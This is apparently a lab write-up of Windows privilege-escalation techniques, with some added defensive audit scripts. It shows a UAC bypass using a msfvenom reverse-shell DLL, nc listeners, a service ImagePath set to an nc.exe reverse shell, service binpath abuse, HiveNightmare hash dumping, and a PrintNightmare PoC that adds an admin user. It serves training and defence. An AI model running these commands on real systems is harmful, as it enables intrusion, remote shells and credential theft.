Attacking the OS

User Account Control

UAC runs applications with standard user rights unless the user explicitly approves admin rights (elevation). It uses integrity levels to limit risky actions and protect the system. UAC is not a complete security boundary, but it adds a layer of safety by asking the user before privileges are raised.

  • Standard token: used for normal tasks.

  • Elevated token: granted after the user accepts the UAC prompt for an admin task.

  • Admin Approval Mode (AAM): admin accounts get both a standard and an elevated token, and their processes start at medium integrity with the standard token.

UAC Configuration

The 10 UAC Group Policy settings, each with its registry value name (under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System), its default, and its meaning:

  • Admin Approval Mode for the built-in Administrator account (FilterAdministratorToken, default: Disabled): controls whether the built-in Administrator account runs in Admin Approval Mode (AAM).

  • Allow UIAccess applications to prompt without the secure desktop (EnableUIADesktopToggle, default: Disabled): allows UIAccess apps to bypass the secure desktop (the dimmed, protected screen).

  • Only elevate UIAccess apps in secure locations (EnableSecureUIAPaths, default: Enabled): UIAccess apps must reside in secure locations (e.g., C:\Windows\System32) to elevate.

  • Behavior of the elevation prompt for administrators in AAM (ConsentPromptBehaviorAdmin, default: Prompt for consent for non-Windows binaries): defines how admins are prompted when elevation is required. If ConsentPromptBehaviorAdmin = 0, elevation happens silently without any prompt (dangerous).

  • Behavior of the elevation prompt for standard users (ConsentPromptBehaviorUser, default: Prompt for credentials on the secure desktop): defines how standard users are prompted when elevation is required.

  • Detect application installations and prompt for elevation (EnableInstallerDetection, default: Enabled on Home editions, Disabled on Enterprise editions): controls whether installer detection triggers UAC elevation prompts.

  • Only elevate signed and validated executables (ValidateAdminCodeSignatures, default: Disabled): if enabled, only signed executables can be elevated.

  • Run all administrators in Admin Approval Mode (EnableLUA, default: Enabled): enables UAC for all administrative accounts.

  • Switch to the secure desktop for elevation prompts (PromptOnSecureDesktop, default: Enabled): displays elevation prompts on the secure desktop.

  • Virtualize file and registry write failures to per-user locations (EnableVirtualization, default: Enabled): redirects legacy app write attempts (e.g., to Program Files or HKLM) to per-user locations.
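The following script is an added example, not part of the original notes: it reads the policy values listed above from the registry key queried later in this page and flags settings that weaken the elevation boundary. It assumes the documented DWORD meanings (for ConsentPromptBehaviorAdmin: 0 = silent elevation, 5 = default, 2 = Always notify) and needs no admin rights.

```powershell
# Added example (not from the original notes): audit the UAC policy values
# from the table above and report the ones that weaken UAC. A value that is
# absent from the key means the Windows default from the table applies.
function Get-UacPolicyAudit {
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $p   = Get-ItemProperty -Path $key -ErrorAction Stop
    $findings = [System.Collections.Generic.List[object]]::new()

    # DWORD by name, or the table's default when the value is not set
    function Get-Val([string]$name, [int]$default) {
        if ($null -ne $p.$name) { [int]$p.$name } else { $default }
    }
    function Add-Finding([string]$sev, [string]$name, [int]$value, [string]$msg) {
        $findings.Add([pscustomobject]@{ Severity = $sev; Setting = $name; Value = $value; Finding = $msg })
    }

    $v = Get-Val 'EnableLUA' 1
    if ($v -ne 1) { Add-Finding 'Critical' 'EnableLUA' $v 'UAC is off: administrators always run with a full token' }

    # 0 = elevate silently, 1/3 = prompt for credentials, 2/4 = prompt for consent,
    # 5 = prompt for consent for non-Windows binaries (signed Windows binaries auto-elevate)
    $v = Get-Val 'ConsentPromptBehaviorAdmin' 5
    switch ($v) {
        0 { Add-Finding 'Critical' 'ConsentPromptBehaviorAdmin' $v 'Silent elevation: any process of an AAM admin elevates without a prompt' }
        5 { Add-Finding 'Warning'  'ConsentPromptBehaviorAdmin' $v 'Windows binaries auto-elevate, which the SystemPropertiesAdvanced.exe bypass below depends on; 2 (Always notify) prompts for every elevation' }
    }

    $v = Get-Val 'PromptOnSecureDesktop' 1
    if ($v -ne 1) { Add-Finding 'Warning' 'PromptOnSecureDesktop' $v 'Prompts appear on the user desktop, where other processes can interact with them' }

    $v = Get-Val 'EnableSecureUIAPaths' 1
    if ($v -ne 1) { Add-Finding 'Warning' 'EnableSecureUIAPaths' $v 'UIAccess apps may elevate from any location, not only secure paths' }

    $v = Get-Val 'EnableUIADesktopToggle' 0
    if ($v -ne 0) { Add-Finding 'Warning' 'EnableUIADesktopToggle' $v 'UIAccess apps may prompt without the secure desktop' }

    $v = Get-Val 'FilterAdministratorToken' 0
    if ($v -ne 1) { Add-Finding 'Info' 'FilterAdministratorToken' $v 'Built-in Administrator runs outside AAM (the default); enable if that account is in use' }

    $v = Get-Val 'ValidateAdminCodeSignatures' 0
    if ($v -ne 1) { Add-Finding 'Info' 'ValidateAdminCodeSignatures' $v 'Unsigned executables can be elevated (the default); 1 limits elevation to signed code' }

    if ($findings.Count -eq 0) { Add-Finding 'Info' '-' 0 'No weak UAC settings found' }
    return $findings
}

Get-UacPolicyAudit | Format-Table -AutoSize -Wrap
```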


UAC Bypass via DLL Hijacking (SystemPropertiesAdvanced.exe)

Verify Current User

C:\mrci0x1> whoami /user
USER INFORMATION
----------------

User Name         SID
================= ==============================================
winlpe-ws03\sarah S-1-5-21-3159276091-2191180989-3781274054-1002

Verify Administrators Group Membership

C:\mrci0x1> net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
mrb3n
sarah
The command completed successfully.

Check Current Privileges

C:\mrci0x1> whoami /priv
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

Verify UAC Status

C:\mrci0x1> REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
    EnableLUA    REG_DWORD    0x1

Verify UAC Prompt Level

C:\mrci0x1> REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
    ConsentPromptBehaviorAdmin    REG_DWORD    0x5

Check Windows Version

PS C:\mrci0x1> [environment]::OSVersion.Version
Major  Minor  Build  Revision
-----  -----  -----  --------
10     0      14393  0

Check PATH Environment Variable

PS C:\htb> cmd /c echo %PATH%
C:\Windows\system32;
C:\Windows;
C:\Windows\System32\Wbem;
C:\Windows\System32\WindowsPowerShell\v1.0\;
C:\Users\sarah\AppData\Local\Microsoft\WindowsApps;

Generate Malicious DLL

mrci0x1@htb$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=8443 -f dll > srrstr.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of dll file: 5120 bytes

Host DLL with Python Server

mrci0x1@htb$ sudo python3 -m http.server 8080

Download DLL to Target

PS C:\htb> curl http://10.10.14.41:8080/srrstr.dll -O "C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll"

Test DLL (Non-Elevated)

C:\htb> rundll32 shell32.dll,Control_RunDLL C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll

On Attack Machine (Listener):

mrci0x1@htb$ nc -lnvp 8443
listening on [any] 8443 ...
connect to [10.10.14.3] from (UNKNOWN) [10.129.43.16] 49789
Microsoft Windows [Version 10.0.14393]
C:\Users\sarah> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State   
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled 
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

Kill Rundll32 Processes

C:\htb> tasklist /svc | findstr "rundll32"
rundll32.exe                  6300 N/A
rundll32.exe                  5360 N/A
rundll32.exe                  7044 N/A

C:\htb> taskkill /PID 7044 /F
SUCCESS: The process with PID 7044 has been terminated.

C:\htb> taskkill /PID 6300 /F
SUCCESS: The process with PID 6300 has been terminated.

C:\htb> taskkill /PID 5360 /F
SUCCESS: The process with PID 5360 has been terminated.

Execute UAC Bypass (DLL Hijack)

C:\htb> C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe

On Attack Machine (Elevated Shell):

mrci0x1@htb$ nc -lvnp 8443
listening on [any] 8443 ...
connect to [10.10.14.3] from (UNKNOWN) [10.129.43.16] 50273
Microsoft Windows [Version 10.0.14393]

C:\Windows\system32>whoami
winlpe-ws03\sarah

C:\Windows\system32>whoami /priv

PRIVILEGES INFORMATION
----------------------
Privilege Name                            Description                                                        State
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Disabled
SeSecurityPrivilege                       Manage auditing and security log                                   Disabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Disabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Disabled
SeSystemProfilePrivilege                  Profile system performance                                         Disabled
SeSystemtimePrivilege                     Change the system time                                             Disabled
SeProfileSingleProcessPrivilege           Profile single process                                             Disabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Disabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Disabled
SeBackupPrivilege                         Back up files and directories                                      Disabled
SeRestorePrivilege                        Restore files and directories                                      Disabled
SeShutdownPrivilege                       Shut down the system                                               Disabled
SeDebugPrivilege                          Debug programs                                                     Disabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Disabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Disabled
SeUndockPrivilege                         Remove computer from docking station                               Disabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Disabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Disabled
SeTimeZonePrivilege                       Change the time zone                                               Disabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Disabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Disabled

Weak Permissions

Weak Service Permissions

Find Modifiable Service Binaries

C:\mrci0x1> SharpUp.exe audit
=== SharpUp: Running Privilege Escalation Checks ===
 
 
=== Modifiable Services ===
 
  Name             : WindscribeService
  DisplayName      : WindscribeService
  Description      : Manages the firewall and controls the VPN tunnel
  State            : Running
  StartMode        : Auto
  PathName         : "C:\Program Files (x86)\Windscribe\WindscribeService.exe"

Verify Service Permissions

C:\mrci0x1> accesschk.exe /accepteula -quvcw WindscribeService
Accesschk v6.13 - Reports effective permissions for securable objects
Copyright © 2006-2020 Mark Russinovich
Sysinternals - www.sysinternals.com
 
WindscribeService
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
  RW NT AUTHORITY\Authenticated Users
        SERVICE_ALL_ACCESS

Authenticated Users have full control.


Modify Service Binary Path

C:\mrci0x1> sc config WindscribeService binpath="cmd /c net localgroup administrators htb-student /add"
[SC] ChangeServiceConfig SUCCESS

Stop and Start Service

C:\mrci0x1> sc stop WindscribeService
SERVICE_NAME: WindscribeService
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x4
        WAIT_HINT          : 0x0
C:\mrci0x1> sc start WindscribeService
[SC] StartService FAILED 1053:
 
The service did not respond to the start or control request in a timely fashion.

Command executed before service failure.


Confirm Admin Group Membership

C:\mrci0x1> net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain
 
Members
 
-------------------------------------------------------------------------------
Administrator
htb-student
mrb3n
The command completed successfully.

Privilege escalation successful.


Cleanup

C:\mrci0x1> sc config WindscribeService binpath="C:\Program Files (x86)\Windscribe\WindscribeService.exe"
C:\mrci0x1> sc start WindscribeService

Unquoted Service Paths

Identify Unquoted Services

C:\htb>wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
System Explorer Service SystemExplorerHelpService C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe Auto

Query Service Config

C:\htb> sc qc SystemExplorerHelpService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SystemExplorerHelpService
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : System Explorer Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

Unquoted path containing spaces, started automatically as LocalSystem: vulnerable to path hijacking if any intermediate directory (e.g., C:\ or C:\Program Files (x86)) is writable.


Permissive Registry ACLs

Enumerate Registry Permissions

C:\mrci0x1> accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services
RW HKLM\System\CurrentControlSet\services\ModelManagerService KEY_ALL_ACCESS

Modify ImagePath

PS C:\mrci0x1> Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443"

ImagePath modified to execute payload.
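As an added example (not from the original notes or the tools shown), the following script audits, from the defender's side, the two conditions exploited in this section and the previous one: low-privileged principals holding SERVICE_CHANGE_CONFIG, WRITE_DAC or similar rights on a service object, and write access on the service's key under HKLM\SYSTEM\CurrentControlSet\Services. It assumes it is run as an administrator and uses only sc.exe sdshow, Get-Acl and the .NET RawSecurityDescriptor parser.

```powershell
# Added example (not from the original notes): find services that low-privileged
# principals can reconfigure, either through the service object's DACL (the
# WindscribeService case) or through the service's registry key (the
# ModelManagerService case). Run as an administrator so every descriptor is readable.

# Principals that should never be able to change what a service runs
$LowPrivSids = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-32-545' = 'BUILTIN\Users'
    'S-1-5-4'      = 'INTERACTIVE'
}

# SERVICE_CHANGE_CONFIG (0x2), WRITE_DAC (0x40000), WRITE_OWNER (0x80000),
# GENERIC_WRITE (0x40000000), GENERIC_ALL (0x10000000); SERVICE_ALL_ACCESS contains all of them
$DangerousServiceMask = 0x2 -bor 0x40000 -bor 0x80000 -bor 0x40000000 -bor 0x10000000

# Registry rights that allow rewriting ImagePath or the key's own ACL
$DangerousKeyRights = [System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, ChangePermissions, TakeOwnership'

function Resolve-Sid($identity) {
    try { $identity.Translate([System.Security.Principal.SecurityIdentifier]).Value } catch { $null }
}

function Get-WeakServiceDacl {
    foreach ($svc in Get-Service) {
        # sc.exe sdshow prints the descriptor as an SDDL string on a line starting with D:
        $sddl = @(sc.exe sdshow $svc.Name 2>$null | Where-Object { $_ -match '^D:' })[0]
        if (-not $sddl) { continue }
        $sd = [System.Security.AccessControl.RawSecurityDescriptor]::new($sddl)
        foreach ($ace in $sd.DiscretionaryAcl) {
            if ($ace.AceType -ne 'AccessAllowed' -or -not $ace.SecurityIdentifier) { continue }
            $sid = $ace.SecurityIdentifier.Value
            if ($LowPrivSids.ContainsKey($sid) -and (($ace.AccessMask -band $DangerousServiceMask) -ne 0)) {
                [pscustomobject]@{ Service = $svc.Name; Principal = $LowPrivSids[$sid]
                                   Rights = ('0x{0:X}' -f $ace.AccessMask); Source = 'service DACL' }
            }
        }
    }
}

function Get-WeakServiceKeyAcl {
    foreach ($key in Get-ChildItem -Path 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue) {
        $acl = Get-Acl -Path $key.PSPath -ErrorAction SilentlyContinue
        if (-not $acl) { continue }
        foreach ($rule in $acl.Access) {
            if ($rule.AccessControlType -ne 'Allow') { continue }
            $sid = Resolve-Sid $rule.IdentityReference
            if ($sid -and $LowPrivSids.ContainsKey($sid) -and (([int]$rule.RegistryRights -band [int]$DangerousKeyRights) -ne 0)) {
                [pscustomobject]@{ Service = $key.PSChildName; Principal = $LowPrivSids[$sid]
                                   Rights = $rule.RegistryRights.ToString(); Source = 'registry key ACL' }
            }
        }
    }
}

@(Get-WeakServiceDacl) + @(Get-WeakServiceKeyAcl) | Format-Table -AutoSize
```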


Modifiable Registry Autorun Binaries

Enumerate Autoruns

PS C:\mrci0x1> Get-CimInstance Win32_StartupCommand | select Name,command,Location,User | fl
Name     : OneDrive
command  : "C:\Users\mrb3n\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
Location : HKU\S-1-5-21-2374636737-2633833024-1808968233-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
User     : WINLPE-WS01\mrb3n

Name     : Windscribe
command  : "C:\Program Files (x86)\Windscribe\Windscribe.exe" -os_restart
Location : HKU\S-1-5-21-2374636737-2633833024-1808968233-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
User     : WINLPE-WS01\mrb3n

Name     : SecurityHealth
command  : %windir%\system32\SecurityHealthSystray.exe
Location : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
User     : Public

Name     : VMware User Process
command  : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
Location : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
User     : Public

Name     : VMware VM3DService Process
command  : "C:\WINDOWS\system32\vm3dservice.exe" -u
Location : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
User     : Public

If the autorun binary is writable, replacing it provides persistence.
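The following script is an added example, not part of the original notes; with one ACL helper it checks the three file-system preconditions demonstrated above: PATH directories the current user can write to (what the srrstr.dll hijack relied on), unquoted service paths with a writable intermediate directory, and autorun binaries a non-admin can replace. It assumes Get-Acl can read the ACLs in question and deliberately treats the current user as a low-privileged principal so that per-profile locations such as WindowsApps are reported.

```powershell
# Added example (not from the original notes): report locations that a
# low-privileged principal can write to and that Windows later trusts for
# code execution: PATH directories, unquoted service paths, autorun binaries.

# Groups that must not have write access, plus the current user so that
# directories and autoruns inside the user's own profile are reported too
$LowPrivSids = @{ 'S-1-1-0' = 'Everyone'; 'S-1-5-11' = 'Authenticated Users'
                  'S-1-5-32-545' = 'BUILTIN\Users'; 'S-1-5-4' = 'INTERACTIVE' }
$me = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$LowPrivSids[$me.User.Value] = $me.Name

# WriteData, AppendData, Delete, ChangePermissions, TakeOwnership, GENERIC_WRITE, GENERIC_ALL
$WriteBits = 0x2 -bor 0x4 -bor 0x10000 -bor 0x40000 -bor 0x80000 -bor 0x40000000 -bor 0x10000000

function Get-LowPrivWriters([string]$Path) {
    # Names of low-privileged principals with an Allow ACE granting write on $Path
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return }
    $names = foreach ($rule in $acl.Access) {
        if ($rule.AccessControlType -ne 'Allow') { continue }
        try { $sid = $rule.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value } catch { continue }
        if ($LowPrivSids.ContainsKey($sid) -and (([int]$rule.FileSystemRights -band $WriteBits) -ne 0)) { $LowPrivSids[$sid] }
    }
    $names | Select-Object -Unique
}

function New-Finding($check, $target, $who, $note) {
    [pscustomobject]@{ Check = $check; Target = $target; WritableBy = ($who -join ', '); Note = $note }
}

function Get-WritablePathDirs {
    foreach ($dir in ($env:PATH -split ';' | Where-Object { $_ } | Select-Object -Unique)) {
        if (-not (Test-Path -LiteralPath $dir -PathType Container)) { continue }
        $who = @(Get-LowPrivWriters $dir)
        if ($who) {
            # DLLs already sitting in a writable PATH directory deserve a look
            $dlls = @(Get-ChildItem -LiteralPath $dir -Filter *.dll -ErrorAction SilentlyContinue).Count
            New-Finding 'PATH directory' $dir $who "$dlls DLL(s) present"
        }
    }
}

function Get-WritableUnquotedServicePaths {
    foreach ($svc in Get-CimInstance Win32_Service) {
        $p = $svc.PathName
        if (-not $p -or $p.StartsWith('"')) { continue }
        if ($p -match '^(?<exe>.+?\.exe)') { $exe = $Matches.exe } else { continue }
        if ($exe -notmatch ' ') { continue }
        # At each space the service controller may try a shorter executable name,
        # so the parent directory of every space-delimited prefix matters
        $dirs = for ($i = 0; $i -lt $exe.Length; $i++) {
            if ($exe[$i] -eq ' ') { Split-Path -Path $exe.Substring(0, $i) -Parent }
        }
        foreach ($dir in ($dirs | Where-Object { $_ } | Select-Object -Unique)) {
            $who = @(Get-LowPrivWriters $dir)
            if ($who) { New-Finding 'Unquoted service path' "$($svc.Name): $exe" $who "writable: $dir" }
        }
    }
}

function Get-WritableAutoruns {
    foreach ($a in Get-CimInstance Win32_StartupCommand) {
        $cmd = [System.Environment]::ExpandEnvironmentVariables($a.Command)
        # Quoted path, or the first token ending in .exe
        if ($cmd -match '^"(?<exe>[^"]+)"' -or $cmd -match '^(?<exe>.+?\.exe)') { $exe = $Matches.exe } else { continue }
        if (-not (Test-Path -LiteralPath $exe -PathType Leaf)) { continue }
        $who = @(Get-LowPrivWriters $exe)
        if ($who) { New-Finding 'Autorun binary' "$($a.Name) ($($a.Location))" $who $exe }
    }
}

@(Get-WritablePathDirs) + @(Get-WritableUnquotedServicePaths) + @(Get-WritableAutoruns) | Format-Table -AutoSize -Wrap
```

HKLM autoruns run for every user who logs on, so a writable entry there matters more than one under a single user's HKU hive.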


Historical Example: UsoSvc (Patched CVE-2019-1322)

https://github.com/apt69/COMahawk


Kernel Exploits

The following table summarizes notable kernel exploits from Windows XP to Server 2016, covering remote code execution (RCE) and local privilege escalation (LPE) vulnerabilities:

Exploits (table rows): MS03-026, MS08-067, MS17-010, CVE-2021-36934, CVE-2021-1675, CVE-2020-0668

Windows versions (table columns): XP SP0-SP3, Vista SP0-SP2, 2008 SP0-SP2, 7 SP0-SP1, 2008R2 SP0-SP1, 8/8.1, 2012/2012R2, 10, 2016


Missing Patches

Enumerate Installed Patches

PS C:\mrci0x1> systeminfo

(System info output shortened for brevity)

Using wmic qfe list brief

C:\htb> wmic qfe list brief
Description      HotFixID   InstalledBy          InstalledOn
Update           KB4601056  NT AUTHORITY\SYSTEM  3/27/2021
Update           KB4513661                       1/9/2020
Security Update  KB4516115                       1/9/2020
Security Update  KB4535680  NT AUTHORITY\SYSTEM  3/27/2021
Security Update  KB5000908  NT AUTHORITY\SYSTEM  3/27/2021
Security Update  KB5000808  NT AUTHORITY\SYSTEM  3/27/2021

Using Get-Hotfix

PS C:\mrci0x1> Get-Hotfix

Vulnerability Mapping

Cross-referencing the installed hotfixes against the Microsoft Update Catalog shows several critical updates missing. The system is potentially vulnerable to:

  • MS08-067

  • MS17-010 (EternalBlue)

  • CVE-2021-36934 (HiveNightmare)

  • CVE-2021-1675 / CVE-2021-34527 (PrintNightmare)

  • CVE-2020-0668


MS08-067 (Server Service RCE)

SMB Port Reachable

Port 445 open internally.

Launch Exploit

Metasploit:

msf > use exploit/windows/smb/ms08_067_netapi

Exploit successful — SYSTEM shell obtained.


MS17-010 (EternalBlue)

Launch Exploit

Metasploit:

msf > use exploit/windows/smb/ms17_010_eternalblue

Exploit successful — SYSTEM shell obtained.


CVE-2021-36934 (HiveNightmare)

Check SAM Permissions

C:\mrci0x1> icacls C:\Windows\System32\config\SAM
C:\Windows\System32\config\SAM BUILTIN\Administrators:(I)(F)
                               NT AUTHORITY\SYSTEM:(I)(F)
                               BUILTIN\Users:(I)(RX)
                               APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                               APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

Read access for unprivileged users confirmed.

Run HiveNightmare PoC

PS C:\Users\htb-student\Desktop> .\HiveNightmare.exe
Success: SAM hive dumped to SAM-2021-08-07
Success: SECURITY hive dumped to SECURITY-2021-08-07
Success: SYSTEM hive dumped to SYSTEM-2021-08-07

Extract Hashes

mrci0x1@htb[/htb]$ impacket-secretsdump -sam SAM-2021-08-07 -system SYSTEM-2021-08-07 -security SECURITY-2021-08-07 local
Administrator:500:...:7796ee39fd3a9c3a1844556115ae1a54:::
Guest:501:...:31d6cfe0d16ae931b73c59d7e0c089c0:::
mrb3n:1001:...:7796ee39fd3a9c3a1844556115ae1a54:::
htb-student:1002:...:3c0e5d303ec84884ad5c3b7876a06ea6:::

NTLM hashes extracted.


CVE-2021-1675 / CVE-2021-34527 (PrintNightmare)

Verify Spooler Service

PS C:\mrci0x1> ls \\localhost\pipe\spoolss

Spooler pipe exists.

Bypass Execution Policy

PS C:\mrci0x1> Set-ExecutionPolicy Bypass -Scope Process
Execution Policy Change
The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose
you to the security risks described in the about_Execution_Policies help topic at
https:/go.microsoft.com/fwlink/?LinkID=135170. Do you want to change the execution policy?
[Y] Yes  [A] Yes to All  [N] No  [L] No to All  [S] Suspend  [?] Help (default is "N"): A

Execute PoC

PS C:\mrci0x1> Import-Module .\CVE-2021-1675.ps1
PS C:\mrci0x1> Invoke-Nightmare -NewUser "hacker" -NewPassword "Pwnd1234!" -DriverName "PrintIt"
[+] created payload at C:\Users\htb-student\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_ce3301b66255a0fb\Amd64\mxdwdrv.dll"
[+] added user hacker as local administrator
[+] deleting payload from C:\Users\htb-student\AppData\Local\Temp\nightmare.dll

Verify New Admin User

PS C:\mrci0x1> net user hacker
User name                    hacker
Full Name                    hacker
Comment                      
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            8/9/2021 12:12:01 PM
Password expires             Never
Password changeable          8/9/2021 12:12:01 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Administrators       
Global Group memberships     *None                 
The command completed successfully.

Privilege escalation confirmed.
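The following script is an added example (not from the original notes or the PoCs above) that checks, from the defender's side, the preconditions the HiveNightmare and PrintNightmare sections rely on: BUILTIN\Users read access on the SAM, SECURITY and SYSTEM hives plus an existing shadow copy to read them from, and a running Spooler with non-admin driver installation allowed. "Exposed" is a heuristic on those conditions only; the icacls inheritance reset and the PointAndPrint registry value are Microsoft's published mitigations, and patch level must be checked separately (see Missing Patches above).

```powershell
# Added example (not from the original notes): exposure checks for
# CVE-2021-36934 (HiveNightmare) and CVE-2021-1675 / CVE-2021-34527 (PrintNightmare).
function Test-HiveNightmareExposure {
    $configDir = Join-Path $env:windir 'System32\config'
    $usersSid  = 'S-1-5-32-545'   # BUILTIN\Users
    $readBit   = [int][System.Security.AccessControl.FileSystemRights]::ReadData
    $readable  = foreach ($name in 'SAM', 'SECURITY', 'SYSTEM') {
        $hive = Join-Path $configDir $name
        $acl  = Get-Acl -LiteralPath $hive -ErrorAction SilentlyContinue
        if (-not $acl) { continue }
        foreach ($rule in $acl.Access) {
            try { $sid = $rule.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value } catch { continue }
            if ($sid -eq $usersSid -and $rule.AccessControlType -eq 'Allow' -and (([int]$rule.FileSystemRights -band $readBit) -ne 0)) { $hive }
        }
    }
    $readable = @($readable | Select-Object -Unique)
    # The live hives are locked, so the PoC reads them from a Volume Shadow Copy instead
    $shadows = @(Get-CimInstance Win32_ShadowCopy -ErrorAction SilentlyContinue)
    [pscustomobject]@{
        Check         = 'CVE-2021-36934'
        UsersReadable = ($readable -join ', ')
        ShadowCopies  = $shadows.Count
        Exposed       = ($readable.Count -gt 0 -and $shadows.Count -gt 0)
        Remediation   = 'icacls %windir%\system32\config\*.* /inheritance:e, then delete existing shadow copies'
    }
}

function Test-PrintNightmareExposure {
    $spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    $ppKey   = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
    $pp      = Get-ItemProperty -Path $ppKey -ErrorAction SilentlyContinue
    # 1 = only administrators may install print drivers through Point and Print
    $restricted = ($null -ne $pp) -and ([int]$pp.RestrictDriverInstallationToAdministrators -eq 1)
    $running    = ($null -ne $spooler) -and ($spooler.Status -eq 'Running')
    $state      = if ($spooler) { $spooler.Status.ToString() } else { 'not installed' }
    [pscustomobject]@{
        Check                   = 'CVE-2021-1675 / CVE-2021-34527'
        SpoolerState            = $state
        DriverInstallRestricted = $restricted
        Exposed                 = ($running -and -not $restricted)
        Remediation             = 'Disable the Spooler service where printing is not needed; otherwise set RestrictDriverInstallationToAdministrators=1 under the PointAndPrint key and apply the July 2021 security updates'
    }
}

Test-HiveNightmareExposure | Format-List
Test-PrintNightmareExposure | Format-List
```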


CVE-2020-0668 (Windows Service Tracing)

Verify Lack of Backup Privilege

C:\mrci0x1> whoami /priv
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
